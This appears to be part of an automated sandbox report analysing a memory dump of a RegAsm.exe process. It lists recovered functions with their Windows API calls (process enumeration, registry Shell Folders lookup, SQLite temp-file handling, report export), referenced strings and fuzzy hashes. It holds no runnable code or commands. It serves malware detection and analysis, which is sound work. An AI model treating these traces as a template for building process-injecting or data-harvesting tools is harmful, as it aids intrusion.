                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                • String ID: sysdatetimepick32
                                                                • API String ID: 1028950076-4169760276
                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$FreeLoadMessage
                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                • API String ID: 3897320386-317687271
                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                • API String ID: 4271163124-70141382
                                                                • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                • API String ID: 4139908857-3953557276
                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: -journal$-wal
                                                                • API String ID: 438689982-2894717839
                                                                • Opcode ID: 7d95f287df1cc243a0b50aae9b96e7708f3abc865263beea37468beb3a21e1ea
                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                • Opcode Fuzzy Hash: 7d95f287df1cc243a0b50aae9b96e7708f3abc865263beea37468beb3a21e1ea
                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Item$Dialog$MessageSend
                                                                • String ID:
                                                                • API String ID: 3975816621-0
                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                • String ID:
                                                                • API String ID: 4218492932-0
                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                APIs
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                • memcpy.MSVCRT ref: 0044A988
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: gj
                                                                • API String ID: 438689982-4203073231
                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                • memset.MSVCRT ref: 00405ABB
                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$FocusItemmemset
                                                                • String ID:
                                                                • API String ID: 4281309102-0
                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfwcscat
                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                • API String ID: 384018552-4153097237
                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 2029023288-3849865405
                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                APIs
                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                • memset.MSVCRT ref: 00405455
                                                                • memset.MSVCRT ref: 0040546C
                                                                • memset.MSVCRT ref: 00405483
                                                                • memcpy.MSVCRT ref: 00405498
                                                                • memcpy.MSVCRT ref: 004054AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$memcpy$ErrorLast
                                                                • String ID: 6$\
                                                                • API String ID: 404372293-1284684873
                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                APIs
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLastSleep$??3@
                                                                • String ID:
                                                                • API String ID: 1040972850-0
                                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                • String ID:
                                                                • API String ID: 1331804452-0
                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                APIs
                                                                Strings
                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                • <%s>, xrefs: 004100A6
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                • API String ID: 3473751417-2880344631
                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$_snwprintfmemset
                                                                • String ID: %2.2X
                                                                • API String ID: 2521778956-791839006
                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfwcscpy
                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                • API String ID: 999028693-502967061
                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                APIs
                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                • memset.MSVCRT ref: 0040C439
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                • memset.MSVCRT ref: 0040C4D0
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                • String ID:
                                                                • API String ID: 1973883786-0
                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                APIs
                                                                • memset.MSVCRT ref: 004116FF
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                • API String ID: 2618321458-3614832568
                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                APIs
                                                                • memset.MSVCRT ref: 004185FC
                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@AttributesFilememset
                                                                • String ID:
                                                                • API String ID: 776155459-0
                                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                • malloc.MSVCRT ref: 00417524
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                • String ID:
                                                                • API String ID: 2308052813-0
                                                                • Opcode ID: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                • Opcode Fuzzy Hash: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                APIs
                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$??3@
                                                                • String ID: %s\etilqs_$etilqs_
                                                                • API String ID: 1589464350-1420421710
                                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastMessage_snwprintf
                                                                • String ID: Error$Error %d: %s
                                                                • API String ID: 313946961-1552265934
                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                • API String ID: 0-1953309616
